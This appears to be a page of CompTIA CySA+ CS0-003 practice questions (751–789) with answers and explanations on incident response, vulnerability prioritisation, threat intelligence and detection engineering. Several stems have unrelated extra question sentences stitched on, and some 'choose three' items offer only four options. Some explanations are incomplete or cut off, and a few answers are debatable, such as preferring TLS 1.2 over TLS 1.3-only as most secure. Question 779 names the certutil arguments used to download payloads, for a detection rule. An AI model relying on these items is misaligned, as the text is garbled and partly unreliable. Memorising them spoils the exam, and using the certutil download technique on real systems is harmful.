CompTIA CySA+ CS0-003 (CS0-003) — Questions 751825

989 questions total · 14pages · All types, answers revealed

Page 10

Page 11 of 14

Page 12
751
MCQmedium

An analyst has several malware samples from the same campaign and wants to detect related files based on unique strings and byte patterns. Which method is MOST appropriate? In the alert triage phase, Which action gives the analyst the clearest next triage step?

A.Tune DHCP lease duration
B.Use only a firewall deny rule for port 443
C.Create and test a YARA rule against known-good and known-bad samples
D.Create a CVE entry
AnswerC

YARA rules are suitable for identifying malware families using file strings, byte sequences, and conditions.

Why this answer

YARA rules are specifically designed to identify and classify malware samples based on textual or binary patterns, including unique strings and byte sequences. By testing a YARA rule against known-good and known-bad samples, the analyst can validate its accuracy and ensure it reliably detects related files from the same campaign while minimizing false positives.

Exam trap

The CS0-003 exam often tests the distinction between detection methods (YARA) and network-level controls (DHCP, firewall) or vulnerability management (CVE), leading candidates to choose a familiar but irrelevant option like a firewall rule.

How to eliminate wrong answers

Option A is wrong because tuning DHCP lease duration affects network address assignment and renewal timing, not malware detection or file analysis. Option B is wrong because using only a firewall deny rule for port 443 would block HTTPS traffic but does not help identify or correlate malware samples based on strings or byte patterns. Option D is wrong because creating a CVE entry is a formal process for documenting a vulnerability, not a method for detecting related malware files based on unique strings or byte patterns.

752
MCQhard

During a post-incident review, the team identifies that detection was delayed because alerts from multiple sources were not correlated. Which improvement would BEST address this issue?

A.Disable non-critical alerts
B.Implement a SIEM solution
C.Increase the number of security staff
D.Increase logging verbosity
AnswerB

SIEM correlates logs and alerts to detect incidents faster.

Why this answer

Implementing a SIEM (Security Information and Event Management) system correlates alerts from various sources, reducing false positives and improving detection speed.

753
MCQmedium

An organization uses OpenSCAP to perform compliance scanning. The scan results indicate that a system fails to meet a STIG requirement. Which of the following best describes the purpose of STIGs?

A.They are used solely for web application security
B.They are vulnerability scoring standards
C.They are industry-standard benchmarks for cloud security
D.They are developed by the DoD to secure its information systems
AnswerD

STIGs are official DoD guidelines.

Why this answer

STIGs are detailed security configuration guides for DoD systems, providing hardening requirements.

754
MCQmedium

During a ransomware attack, several workstations have been encrypted. The incident response team has identified the ransomware variant and determined it does not have a known decryption tool. Which containment strategy is MOST appropriate?

A.Disconnect the affected workstations from the network, but leave them powered on.
B.Power off all affected workstations immediately.
C.Run a full antivirus scan on the affected workstations.
D.Restore all affected workstations from backups immediately.
AnswerA

Disconnecting from network stops lateral movement while preserving evidence.

Why this answer

Disconnecting the affected workstations from the network (but leaving them powered on) preserves volatile evidence in memory (e.g., encryption keys, process artifacts) and prevents the ransomware from spreading to other hosts via SMB, RDP, or other lateral movement protocols. Powering off would destroy this critical forensic data, while leaving them connected risks further encryption of network shares.

Exam trap

CompTIA often tests the misconception that immediate power-off is best for safety, but the trap here is that preserving volatile memory for forensic analysis is prioritized over a simple shutdown, especially when no decryption tool exists and evidence may lead to key recovery.

How to eliminate wrong answers

Option B is wrong because immediately powering off workstations destroys volatile memory (RAM) that may contain the ransomware's encryption keys, process handles, or network connections, hindering forensic analysis and potential decryption. Option C is wrong because running a full antivirus scan on already-encrypted files is ineffective—the ransomware binary may be removed, but encrypted files remain unrecoverable without a decryption tool, and scanning consumes time that could allow further spread. Option D is wrong because restoring from backups before containing the threat risks re-infection if the ransomware is still active on the network or if backups are also encrypted; containment must precede recovery.

755
MCQeasy

A security analyst is reviewing a vulnerability scan report and sees a plugin with a CVSS v3.1 base score of 7.5. The attack vector is 'Network', attack complexity is 'Low', privileges required is 'None', user interaction is 'None', scope is 'Unchanged', and the confidentiality impact is 'High', but integrity and availability impacts are 'None'. This vulnerability is best described as:

A.A remote code execution vulnerability
B.A denial of service vulnerability
C.An information disclosure vulnerability
D.A privilege escalation vulnerability
AnswerC

High confidentiality impact with no other impacts indicates information disclosure.

Why this answer

The vector indicates a remote, easily exploitable vulnerability that only affects confidentiality (e.g., information disclosure).

756
MCQmedium

After a high-priority SOC escalation, after containing a compromised host, analysis shows persistence through a scheduled task and a stolen service account. What is required before recovery? During containment, which decision is most defensible? which response best matches incident-response practice?

A.Reconnect the host because users need it
B.Disable logging to improve performance
C.Close the incident after isolation
D.Remove persistence, rotate affected credentials, and verify no related hosts remain compromised
AnswerD

Recovery should follow eradication of persistence and credential exposure. In containment, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because after containment, the incident response process requires removing the persistence mechanism (the scheduled task), rotating the stolen service account credentials to prevent re-authentication, and verifying that no other hosts are compromised (lateral movement check). This aligns with the NIST SP 800-61 recovery phase, which mandates eradication before recovery to ensure the threat is fully removed.

Exam trap

CompTIA often tests the misconception that isolation alone is sufficient to close an incident, but the trap here is that persistence and credential theft require active eradication and verification steps before recovery can begin.

How to eliminate wrong answers

Option A is wrong because reconnecting a compromised host without eradication risks re-infection or lateral movement, violating containment principles. Option B is wrong because disabling logging during an incident destroys forensic evidence and violates chain-of-custody requirements; logging is critical for post-incident analysis. Option C is wrong because closing the incident after isolation without eradication and verification leaves persistence mechanisms and stolen credentials active, allowing the attacker to regain access.

757
MCQmedium

In a regulated payment environment, a malware alert affects a single kiosk with no sensitive access. A second alert shows the same malware on a domain admin workstation. What should drive severity? During recovery, which decision is most defensible? which action best reduces risk without losing evidence?

A.Whether the alert arrived first
B.Business impact, privilege level, asset criticality, and spread potential
C.Alphabetical order of hostnames
D.The analyst's preferred dashboard theme
AnswerB

Severity should reflect impact and risk, not only malware family name. In recovery, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option B is correct because severity in incident response must be driven by business impact, privilege level, asset criticality, and spread potential. The domain admin workstation has elevated privileges and access to sensitive systems, making it a higher priority than a non-sensitive kiosk, regardless of alert order. This aligns with NIST SP 800-61 and common IR frameworks that prioritize containment based on risk, not chronology.

Exam trap

The CS0-003 exam often tests the misconception that alert chronology or simple asset labels determine severity, when in fact the correct approach is a risk-based assessment incorporating business impact, privilege, criticality, and spread potential.

How to eliminate wrong answers

Option A is wrong because alert arrival time is irrelevant to severity; a later alert on a critical asset should supersede an earlier alert on a low-value asset. Option C is wrong because alphabetical order of hostnames has no bearing on risk or incident response priority. Option D is wrong because an analyst's preferred dashboard theme is a cosmetic preference and does not influence severity decisions.

758
MCQhard

A vulnerability assessment identifies that an external-facing server has an outdated TLS version configured. The server supports TLS 1.0 and SSL 3.0. Which of the following is the MOST secure configuration change?

A.Upgrade to TLS 1.3 and disable all others
B.Disable TLS 1.0 and keep SSL 3.0
C.Enable TLS 1.2 and disable SSL 3.0 and TLS 1.0
D.Disable SSL 3.0 and enable TLS 1.2
AnswerC

Eliminates all insecure protocols and enables a secure one.

Why this answer

Option C is correct because it disables the insecure SSL 3.0 and TLS 1.0 protocols while enabling TLS 1.2, which is currently the most widely supported secure TLS version. TLS 1.2 provides strong cipher suites and has no known practical vulnerabilities like POODLE (SSL 3.0) or BEAST (TLS 1.0). This configuration balances security with compatibility for modern clients.

Exam trap

The CS0-003 exam often tests the distinction between 'disabling only the most vulnerable protocol' (Option D) versus 'disabling all insecure protocols and enabling a secure one' (Option C), trapping candidates who forget that TLS 1.0 is also considered deprecated and insecure.

How to eliminate wrong answers

Option A is wrong because upgrading directly to TLS 1.3 may break compatibility with many existing clients and servers that do not yet support TLS 1.3, and the question asks for the 'most secure' change given the current state, not a future-proof upgrade. Option B is wrong because keeping SSL 3.0 enabled leaves the server vulnerable to the POODLE attack (CVE-2014-3566), which allows plaintext recovery from encrypted sessions. Option D is wrong because it only disables SSL 3.0 but does not explicitly disable TLS 1.0, leaving the server vulnerable to the BEAST attack (CVE-2011-3389) and other TLS 1.0 weaknesses.

759
MCQmedium

A security analyst receives a threat intelligence report containing detailed Indicators of Compromise (IoCs) such as IP addresses, file hashes, and domain names. What is the MOST appropriate audience for distributing this type of report?

A.The Security Operations Center (SOC) team
B.External auditors
C.All employees in the organization
D.Senior executives and the board of directors
AnswerA

Correct. The SOC uses tactical IoCs to enhance detection and response.

Why this answer

Tactical intelligence, such as IoCs, is most useful for frontline technical teams like the SOC, who can use it to detect and block threats. Executives typically receive strategic intelligence.

760
MCQmedium

A security analyst is creating a correlation rule in the SIEM to detect DGA (Domain Generation Algorithm) activity. Which of the following data points would be most useful to include in the rule?

A.High number of DNS queries to domains with high entropy and frequent NXDOMAIN responses
B.Multiple successful connections to a single external IP
C.Large data transfers over HTTPS
D.Unusual parent-child process relationships
AnswerA

These are classic indicators of DGA.

Why this answer

DGA domains are algorithmically generated and often have high entropy, frequent NXDOMAIN responses (because the domain may not yet be registered), and are rarely seen in the environment.

761
MCQmedium

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

A.Assume encryption means the transfer is safe
B.Disable all outbound internet access for the organisation
C.Delete historical flow records to reduce SIEM cost
D.Correlate flow volume with database audit logs and the destination reputation
AnswerD

Flow data identifies suspicious transfer volume; database audit logs and destination context help determine whether sensitive data may have left.

Why this answer

Option D is correct because correlating flow volume with database audit logs and destination reputation provides direct evidence of whether the encrypted outbound transfer is legitimate database replication or exfiltration. This approach leverages existing security controls (flow records, audit logs, threat intelligence) to validate the activity without assuming encryption implies safety or disrupting operations.

Exam trap

The CS0-003 exam often tests the misconception that encryption guarantees safety (Option A) or that immediate blocking (Option B) is the best triage step, when in fact correlation with multiple data sources (Option D) is the proper detection engineering approach to reduce false positives while preserving signal.

How to eliminate wrong answers

Option A is wrong because encryption does not imply safety; attackers commonly use encryption to hide exfiltration, and assuming otherwise ignores the suspicious timing (off-hours) and unfamiliar ASN. Option B is wrong because disabling all outbound internet access is a drastic, disruptive response that would block legitimate business operations and is not a triage step; it violates the principle of least disruption during investigation. Option C is wrong because deleting historical flow records destroys forensic evidence needed for root cause analysis and compliance, and does not address the immediate triage need.

762
MCQhard

While supporting a hybrid workforce, a developer accidentally committed a cloud access key to a public repository. Logs show the key was used from an unfamiliar IP. What should be done first? During eradication, which decision is most defensible? which evidence should guide the decision?

A.Wait to see whether charges increase
B.Disable or rotate the key and review actions performed with it
C.Block the developer's laptop from Wi-Fi
D.Ask the developer to delete the commit only
AnswerB

The exposed credential must be invalidated and its use scoped through audit logs. In eradication, responders need action that reduces risk while preserving the investigation record.

Why this answer

The correct first step is to disable or rotate the compromised cloud access key and review actions performed with it. This immediately revokes the attacker's access, preventing further unauthorized use, while the review of logs and API calls determines the scope of the breach. Waiting or blocking the developer's laptop does not address the exposed credential or the active threat from the unfamiliar IP.

Exam trap

The CS0-003 exam often tests the principle of immediate containment over investigation or blame; the trap here is choosing a delay tactic (Option A) or a non-technical, irrelevant action (Option C) instead of the direct, credential-focused containment step.

How to eliminate wrong answers

Option A is wrong because waiting to see whether charges increase is a passive, reactive approach that allows the attacker continued access, potentially leading to data exfiltration, resource abuse, and escalating costs. Option C is wrong because blocking the developer's laptop from Wi-Fi does not revoke the compromised cloud access key; the key can still be used from any other device or IP, and this action does not address the root cause or the ongoing threat.

763
MCQmedium

A security analyst is configuring a vulnerability scanner to assess internal servers. The goal is to identify missing patches and misconfigurations without impacting system performance. Which scan configuration is most appropriate?

A.Non-credentialed external scan
B.Full port scan with vulnerability detection
C.Credentialed internal scan
D.Agent-based scan with performance throttling
AnswerC

Credentialed scans provide comprehensive results with minimal impact on performance.

Why this answer

A credentialed scan uses authenticated credentials to access the target, allowing deeper checks for missing patches and misconfigurations without intrusive techniques. This provides accurate results with less impact than non-credentialed scans that might cause crashes.

764
MCQmedium

During a traffic analysis, a security analyst notices repeated TCP SYN packets sent to an internal server from an external IP, but the server never responds with SYN-ACK. The external IP sends a new SYN packet every 30 seconds. What does this behavior most likely indicate?

A.A SYN flood attack
B.A misconfigured firewall dropping SYN-ACK packets
C.A TCP port scan
D.A half-open connection due to network latency
AnswerC

Repeated SYN packets to the same destination without response is typical of a port scan seeking open ports.

Why this answer

The lack of SYN-ACK responses suggests the server is not reachable or the port is closed. Repeated SYN packets without response are characteristic of a TCP port scan, as the scanner waits for a timeout and retries.

765
Multi-Selectmedium

A security analyst needs to provide threat intelligence to different audiences. Which TWO of the following are appropriate dissemination approaches?

Select 2 answers
A.Sending tactical intelligence with IoCs to the SOC team
B.Publishing operational intelligence on the company intranet
C.Discussing classified threat data in public forums
D.Sharing raw intelligence feeds with all employees
E.Providing strategic intelligence reports to executives
AnswersA, E

SOC teams need IoCs for detection and response.

Why this answer

Strategic intelligence for executives helps them understand the threat landscape, while tactical intelligence for SOC teams provides IoCs for detection.

766
MCQhard

An analyst is preparing a report that includes Personally Identifiable Information (PII) from a data breach. The report will be shared with external auditors. Which of the following is the BEST practice for handling PII in the report?

A.Include full PII in the report for complete transparency
B.Encrypt the report and send it via email to auditors
C.Use tokenization or pseudonymization to mask PII while preserving analytical value
D.Remove all PII entirely, leaving only anonymized records
AnswerC

Enables audit without exposing sensitive data.

Why this answer

Option C is correct because tokenization or pseudonymization replaces PII with non-sensitive placeholders that retain referential integrity and analytical utility, allowing auditors to perform their review without exposing actual personal data. This approach balances transparency requirements with data minimization principles mandated by regulations like GDPR and PCI DSS, unlike full disclosure or simple encryption which still exposes the original data to the recipient.

Exam trap

CompTIA often tests the misconception that encryption alone is sufficient for data protection in reports, but the trap here is that encryption only secures data in transit or at rest, not after decryption by the recipient, whereas tokenization/pseudonymization provides persistent masking even after the data is accessed.

How to eliminate wrong answers

Option A is wrong because including full PII violates the principle of data minimization and unnecessarily exposes sensitive data to external parties, increasing breach risk and non-compliance with privacy regulations. Option B is wrong because encrypting the report only protects data in transit; once decrypted by the auditors, the full PII is exposed in plaintext, offering no ongoing protection against misuse or further disclosure. Option D is wrong because removing all PII entirely destroys the analytical value needed for audit correlation and verification, effectively rendering the report useless for its intended purpose.

767
Multi-Selectmedium

A security analyst is prioritizing vulnerabilities for remediation. Which TWO factors should be considered HIGHEST when determining prioritization? (Choose two.)

Select 2 answers
A.CVSS base score
B.Number of false positives associated with the scan
C.System owner's preference
D.Age of the vulnerability
E.Known exploit availability
AnswersA, E

CVSS score provides a standardized severity rating.

Why this answer

The CVSS base score provides a standardized, quantitative measure of a vulnerability's severity based on intrinsic characteristics like attack vector and complexity. Prioritizing by CVSS score ensures that remediation efforts focus on vulnerabilities with the highest potential impact, aligning with industry best practices for risk-based vulnerability management.

Exam trap

The CS0-003 exam often tests that candidates confuse vulnerability age with exploit maturity, but age alone is irrelevant without evidence of active exploitation or a functional exploit in the wild.

768
MCQhard

An analyst is performing static analysis on a suspicious executable. The analyst discovers that the PE file has a suspicious section name and a high entropy value. Which tool or technique would be MOST useful for further analyzing the packed nature of the file?

A.Extracting strings from the binary
B.Using a YARA rule to detect the packer
C.Using PEiD or similar packer identifier
D.Running the file in a sandbox
AnswerC

PEiD is designed to detect common packers, cryptors, and compilers.

Why this answer

PEiD or similar tools can detect packers by scanning for known signatures. High entropy and suspicious section names often indicate packing, so using a packer identifier is appropriate.

769
MCQhard

A security analyst is investigating a suspected insider threat incident. The analyst needs to preserve evidence before containment. Which of the following actions should the analyst prioritize to maintain the integrity of digital evidence?

A.Imaging the suspect's hard drive using dd without a write blocker
B.Rebooting the suspect's computer to ensure no hidden processes are running
C.Using a write blocker to create a forensic image of the hard drive
D.Deleting suspicious files to prevent further damage
AnswerC

Write blockers prevent write access, preserving evidence integrity.

Why this answer

Preserving evidence before containment is crucial. Using a write blocker when imaging a hard drive ensures that the original data is not altered, maintaining the integrity of the evidence.

770
MCQeasy

Which analysis technique involves examining the parent-child relationships of processes to identify potentially malicious activity?

A.Network analysis
B.Memory analysis
C.Registry analysis
D.Process analysis
AnswerD

Process analysis includes examining process trees and parent-child relationships to detect suspicious behavior.

Why this answer

Process analysis looks at process trees to find anomalies like a word processor spawning a command shell.

771
Multi-Selecteasy

A security analyst is reviewing a vulnerability scan report and must prioritize remediation efforts. Which TWO factors are most important for prioritizing vulnerability remediation?

Select 2 answers
A.Time since vulnerability published
B.CVSS base score
C.Vendor patch release date
D.Number of hosts affected
E.Availability of public exploit code
AnswersB, E

CVSS base score is a key indicator of severity and is widely used for prioritization.

Why this answer

The CVSS base score (B) provides a standardized, vendor-neutral severity rating (0-10) that reflects the intrinsic characteristics of a vulnerability, such as attack vector, complexity, and impact on confidentiality, integrity, and availability. This score is a primary factor for prioritization because it allows analysts to compare vulnerabilities across different systems and prioritize those with the highest potential for damage, independent of environmental factors.

Exam trap

CompTIA often tests the distinction between intrinsic severity (CVSS base score) and external risk factors (exploit availability), leading candidates to mistakenly prioritize the number of affected hosts (D) or patch release date (C) over these two key factors.

772
MCQhard

A SOC analyst receives an alert from a threat intelligence platform (TIP) about a new phishing campaign. The indicator is a URL. Which enrichment source is BEST for determining the URL's current hosting infrastructure?

A.VirusTotal
B.WHOIS
C.Shodan
D.Passive DNS
AnswerD

Correct. Passive DNS shows IP history and current resolution.

Why this answer

Passive DNS allows querying historical and current IP addresses associated with a domain, revealing hosting changes.

773
MCQmedium

Refer to the exhibit. A security analyst is reviewing SIEM logs and notices repeated entries from the same source IP. Which of the following actions should the analyst take NEXT?

A.Immediately block the source IP at the firewall
B.Check the baseline behavior of the source IP
C.Update the signature database
D.Isolate the affected system for forensic analysis
AnswerB

Comparing against baseline helps determine if the activity is truly anomalous and justifies further action.

Why this answer

Option B is correct because the first step in incident response is to validate whether the activity is malicious by comparing it against a known baseline. Repeated entries from the same source IP could indicate a benign automated process (e.g., a legitimate monitoring tool or scheduled scan) rather than an attack. Checking the baseline behavior prevents unnecessary disruption and aligns with the NIST SP 800-61 incident response framework's emphasis on identification and analysis before containment.

Exam trap

CompTIA often tests the candidate's ability to resist the impulse to immediately block or contain, emphasizing that verification against a baseline is the mandatory next step before any action in the incident response process.

How to eliminate wrong answers

Option A is wrong because immediately blocking the source IP without verifying the baseline could disrupt legitimate services (e.g., a corporate VPN concentrator or authorized vulnerability scanner) and violates the principle of least disruption during initial triage. Option C is wrong because updating the signature database is a preventive maintenance task for IDS/IPS systems, not a reactive step for analyzing a specific repeated log entry; it does not help determine if the source IP's behavior is anomalous. Option D is wrong because isolating the affected system for forensic analysis is a containment step that should only occur after confirming the activity is malicious; premature isolation can cause unnecessary downtime and data loss if the system is not actually compromised.

774
Multi-Selectmedium

A security analyst is performing a web application security assessment and identifies a potential cross-site scripting (XSS) vulnerability. The application is critical to business operations. Which TWO of the following are appropriate immediate actions?

Select 2 answers
A.Take the application offline immediately
B.Implement a web application firewall (WAF) rule to block XSS payloads
C.Ignore the finding because XSS is low risk
D.Notify law enforcement immediately
E.Report the vulnerability to the development team for remediation
AnswersB, E

WAF can provide temporary mitigation.

Why this answer

Reporting the vulnerability to the development team ensures awareness, and implementing a WAF rule can provide temporary protection while a fix is developed.

775
MCQhard

A new cloud log source is onboarded, but analytics fail because source IP, user, and action fields are mapped inconsistently. What should the engineer fix?

A.Log normalization and field mapping in the parser
B.Disable all enrichment lookups
C.Increase the dashboard refresh interval
D.Move logs to cold storage immediately
AnswerA

Detection rules depend on consistent normalized fields across sources.

Why this answer

Log normalization and field mapping in the parser ensure that source IP, user, and action fields from the new cloud log source are consistently transformed into the schema expected by the SIEM or analytics platform. Without this, the analytics engine cannot correlate or alert on the data because the fields are not recognized or are mapped to incorrect attributes, leading to failed analytics.

Exam trap

The CS0-003 exam often tests the misconception that analytics failures are due to display or enrichment issues, when the real problem is almost always a parsing or normalization mismatch at the ingestion layer.

How to eliminate wrong answers

Option B is wrong because disabling all enrichment lookups would remove valuable context (e.g., geo-IP, threat intelligence) but does not fix the root cause of inconsistent field mapping; the logs would still be parsed incorrectly. Option C is wrong because increasing the dashboard refresh interval only changes how often the dashboard updates its display; it has no effect on how the raw log data is parsed or normalized, so the analytics would still fail.

776
Multi-Selectmedium

A vulnerability manager is prioritizing remediation. Which factors should influence risk-based priority? (Choose three.)

Select 3 answers
A.Internet exposure of the affected asset
B.Alphabetical order of the CVE identifier
C.Known exploitation in the wild
D.Business criticality of the affected service
AnswersA, C, D

External reachability increases likelihood of attack.

Why this answer

Internet exposure of the affected asset is a critical factor because assets reachable from the public internet have a larger attack surface and are more likely to be targeted by automated scanners and exploit kits. Risk-based prioritization weighs the likelihood of exploitation, and an internet-facing system inherently faces a higher threat level than an internal-only asset. This aligns with the CVSS environmental metrics (Modified Attack Vector) and common vulnerability scoring frameworks that adjust severity based on network accessibility.

Exam trap

The CS0-003 exam often tests the misconception that all CVSS scores are equal regardless of context, but the trap here is that candidates might think alphabetical order or CVE age is relevant, when in fact only exploitability, exposure, and business impact drive true risk-based priority.

777
Drag & Dropmedium

Arrange the steps for a typical digital forensics investigation process.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

Digital forensics follows identification, preservation, collection, examination, and presentation.

778
Multi-Selecteasy

An incident response team is conducting post-incident activities after containing a malware outbreak. Which TWO activities should be included in the lessons learned phase? (Choose TWO.)

Select 2 answers
A.Deleting all logs from the incident.
B.Conducting a root cause analysis.
C.Rewriting the organization's security policy from scratch.
D.Updating detection rules based on IOCs.
E.Patching all systems immediately.
AnswersB, D

Root cause analysis identifies why the incident occurred.

Why this answer

Lessons learned involves analyzing the incident to improve future response. Updating detection rules based on IOCs and conducting a root cause analysis are key activities.

779
Multi-Selectmedium

A security analyst is creating a Sigma rule to detect use of the LOLBin 'certutil' for downloading payloads. Which THREE command-line arguments should the rule look for to indicate malicious use?

Select 3 answers
A.-urlcache
B.-split
C.-encode
D.-decode
E.-verify
AnswersA, B, D

Used to download files from a URL.

Why this answer

Certutil can be abused to download files using the '-urlcache' and '-split' arguments (or '-f' for force). The combination of '-urlcache' with a URL and output file is typical for downloading malicious payloads. '-verify' is legitimate, '-encode' and '-decode' are used for encoding/decoding, but '-urlcache' and '-split' are key for download.

780
Multi-Selectmedium

Which TWO of the following are essential steps in the incident response phase of 'Containment, Eradication, and Recovery'? (Choose two.)

Select 2 answers
A.Reimage all systems in the environment
B.Disconnect the organization from the internet
C.Remove malicious files and artifacts from affected systems
D.Collect and preserve forensic evidence
E.Isolate affected systems from the network
AnswersC, E

Eradication removes the threat.

Why this answer

Option C is correct because removing malicious files and artifacts from affected systems is a core step in the eradication phase, ensuring that the root cause of the incident is eliminated and the system can be safely restored to normal operations. This step directly addresses the removal of malware, persistence mechanisms, and unauthorized changes that were identified during analysis.

Exam trap

CompTIA often tests the distinction between 'containment' actions (like isolation) and 'eradication' actions (like removal of artifacts), and the trap here is that candidates confuse 'collecting forensic evidence' (which belongs to the identification phase) with a step in the containment/eradication process.

781
MCQeasy

During a post-compromise review, a laptop may contain evidence for a legal investigation. What should the responder document during acquisition? During post-incident improvement, which decision is most defensible? which action should be prioritized before closure?

A.Only the laptop colour
B.Only the ticket priority
C.Only the user's job title
D.Who collected it, when, where, hash values, transfer details, and storage location
AnswerD

Chain of custody records evidence handling and integrity from collection onward. In post-incident improvement, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because forensic acquisition requires a complete chain of custody to ensure evidence integrity and admissibility in legal proceedings. Documenting who collected the evidence, when and where it was collected, cryptographic hash values (e.g., SHA-256) to verify data integrity, transfer details (e.g., write-blocker used, network path), and storage location provides a defensible record that meets legal and organizational standards.

Exam trap

CompTIA often tests the misconception that minimal documentation (like color or job title) is sufficient, when in fact comprehensive chain-of-custody details are required for legal defensibility.

How to eliminate wrong answers

Option A is wrong because documenting only the laptop color provides no forensic value and fails to establish chain of custody or evidence integrity. Option B is wrong because documenting only the ticket priority is irrelevant to forensic acquisition and does not capture any evidence-handling details. Option C is wrong because documenting only the user's job title ignores critical acquisition metadata such as collector identity, timestamps, hash values, and storage location, making the evidence indefensible in court.

782
MCQeasy

A security analyst is reviewing vulnerability scan results and sees a critical vulnerability on a web server with a CVSS score of 9.8. The server is a legacy system that cannot be patched without causing application downtime. The business requires the application to remain available. Which of the following is the BEST course of action?

A.Remove the system from the network.
B.Disable the vulnerable service on the server.
C.Accept the risk and do nothing.
D.Implement a virtual patch using a web application firewall.
AnswerD

Virtual patching via WAF mitigates vulnerability while maintaining availability.

Why this answer

Option D is correct because a virtual patch via a web application firewall (WAF) can inspect and block exploit attempts against the vulnerability without modifying the legacy server's code or binaries. This allows the business-critical application to remain available while mitigating the 9.8 CVSS risk at the network layer, typically using signature-based or behavioral rules to intercept malicious payloads targeting the flaw.

Exam trap

CompTIA often tests the misconception that a critical vulnerability always requires immediate patching or removal, when in reality compensating controls like a WAF virtual patch are the preferred risk treatment for legacy systems that cannot be taken offline.

How to eliminate wrong answers

Option A is wrong because removing the system from the network would cause the exact application downtime the business requires to avoid, and it is an overly drastic measure when a compensating control exists. Option B is wrong because disabling the vulnerable service on the server would likely break the application's functionality, as the service is presumably the core web server process, and this also fails to address the business requirement for availability. Option C is wrong because accepting the risk and doing nothing ignores the critical severity (CVSS 9.8) and the high likelihood of exploitation, which is irresponsible without first attempting a compensating control like a WAF.

783
MCQmedium

A security analyst needs to report a critical vulnerability to the executive team. The report should balance technical details with business impact. Which of the following is the BEST approach?

A.Simply state the vulnerability exists and a patch is available
B.Write a 50-page report covering every technical detail and mitigation option
C.Explain the vulnerability in terms of potential business impact and recommended risk treatment
D.Provide a full technical analysis of the vulnerability and remediation steps
AnswerC

This aligns with executive needs: risk, cost, and decision-making.

Why this answer

Option C is correct because it directly addresses the core requirement of balancing technical details with business impact. For a critical vulnerability, the executive team needs to understand the potential financial, operational, and reputational risks, not just the technical flaw. This approach aligns with the NIST risk management framework, which emphasizes communicating risk in terms of business context to enable informed decision-making on risk treatment (e.g., accept, mitigate, transfer, avoid).

Exam trap

CompTIA often tests the distinction between technical completeness and audience-appropriate communication, trapping candidates who choose Option D because they mistake 'full technical analysis' for the best approach, when the question explicitly requires balancing technical details with business impact for an executive audience.

How to eliminate wrong answers

Option A is wrong because simply stating a vulnerability exists and a patch is available lacks the necessary business context and risk assessment; executives need to understand the potential impact on operations, compliance, and revenue to prioritize remediation. Option B is wrong because a 50-page report with every technical detail is excessive and counterproductive for an executive audience, who require concise, actionable summaries focused on risk and business outcomes, not exhaustive technical minutiae. Option D is wrong because providing a full technical analysis and remediation steps, while thorough, fails to translate the vulnerability into business terms; it omits the critical risk treatment recommendation and does not help executives weigh the cost of remediation against potential business disruption.

784
Multi-Selectmedium

Which conditions should push a vulnerability higher in the remediation queue? (Choose three.)

Select 3 answers
A.The asset supports a critical business process
B.The affected asset is internet-facing
C.Exploitation is observed in the wild
D.The CVE number is easy to remember
AnswersA, B, C

Business impact increases priority.

Why this answer

A is correct because assets supporting critical business processes have a higher impact on organizational operations if compromised. Vulnerability management prioritization frameworks, such as those aligned with the CVSS environmental score, assign greater weight to business criticality. Remediating vulnerabilities on these assets first reduces the risk of significant downtime, data loss, or regulatory non-compliance.

Exam trap

The CS0-003 exam often tests the distinction between factors that increase likelihood (e.g., internet-facing, active exploitation) versus factors that increase impact (e.g., critical business process), and candidates may mistakenly prioritize vulnerabilities based solely on CVSS base score without considering environmental or threat intelligence inputs.

785
MCQeasy

Which of the following best describes the purpose of a threat intelligence report at the operational level?

A.Offer detailed analysis of threat actor TTPs for specific campaigns
B.Deliver technical indicators like IoCs to SOC analysts
C.Provide high-level trends to executive leadership
D.Summarize geopolitical risks affecting the organization
AnswerA

Operational intelligence provides actionable insights for defenders.

Why this answer

Operational intelligence focuses on specific campaigns, tools, and techniques to inform defenders' actions.

786
MCQmedium

A vulnerability report for a critical application shows that a high-risk vulnerability has been accepted by the business owner. What should the analyst include in the report to document this decision?

A.A formal risk acceptance form signed by the business owner with a justification
B.The technical details of the vulnerability only
C.An automatic closure of the vulnerability ticket
D.A note that the vulnerability is low priority
AnswerA

This meets compliance and governance requirements.

Why this answer

Proper risk acceptance documentation requires a formal sign-off by the risk owner, typically including a justification and acceptance date.

787
Multi-Selecthard

A vulnerability assessment has identified multiple issues. Which THREE actions are appropriate steps in the remediation process? (Choose three.)

Select 3 answers
A.Create a change request to apply the necessary patch or configuration change
B.Rescan the system immediately to confirm the vulnerability
C.Uninstall the affected software or service to remove the vulnerability
D.Research the vulnerability to understand its impact and remediation
E.Verify the remediation by performing a follow-up scan or test
AnswersA, D, E

Formal change management helps track and approve modifications.

Why this answer

Option A is correct because in a structured remediation process, applying a patch or configuration change requires a formal change request to ensure proper testing, approval, and documentation, minimizing the risk of unintended disruptions. This aligns with change management best practices in vulnerability management, where uncoordinated changes can introduce new vulnerabilities or break existing functionality.

Exam trap

The CS0-003 exam often tests the misconception that immediate rescanning or drastic removal are valid remediation steps, when in fact the correct sequence requires research, controlled change implementation, and verification.

788
Multi-Selecteasy

An incident response team is analyzing indicators of compromise (IOCs) from a phishing campaign. Which THREE of the following are commonly used IOC types? (Select THREE.)

Select 3 answers
A.CPU registers
B.IP addresses
C.Domain names
D.Software version numbers
E.File hashes
AnswersB, C, E

IP addresses are common IOCs.

Why this answer

Common IOC types include IP addresses, file hashes, domains, URLs, and email indicators. Software versions are not typically IOCs.

789
MCQmedium

A deception credential placed in a file share is used to authenticate to a server. No legitimate user should know the credential. What does this most likely indicate? In the evidence source phase, Which evidence source best supports or refutes the detection?

A.The SIEM parser is always broken
B.A scheduled password rotation completed successfully
C.Credential access or lateral movement activity that warrants high-priority investigation
D.The file share requires more storage capacity
AnswerC

Use of a honey credential is a high-fidelity signal because legitimate workflows should not touch it.

Why this answer

The deception credential is a honeytoken—a fake credential placed in a file share to detect unauthorized use. Since no legitimate user should know it, any authentication attempt using it indicates an attacker has accessed the file share (credential access) and is attempting to move laterally (lateral movement). This warrants high-priority investigation because it directly signals a breach in progress.

Exam trap

The CS0-003 exam often tests the distinction between a detection artifact (like a honeytoken) and a configuration issue (like a broken parser), so candidates mistakenly attribute the alert to a technical failure rather than recognizing it as a deliberate security control triggering on malicious activity.

How to eliminate wrong answers

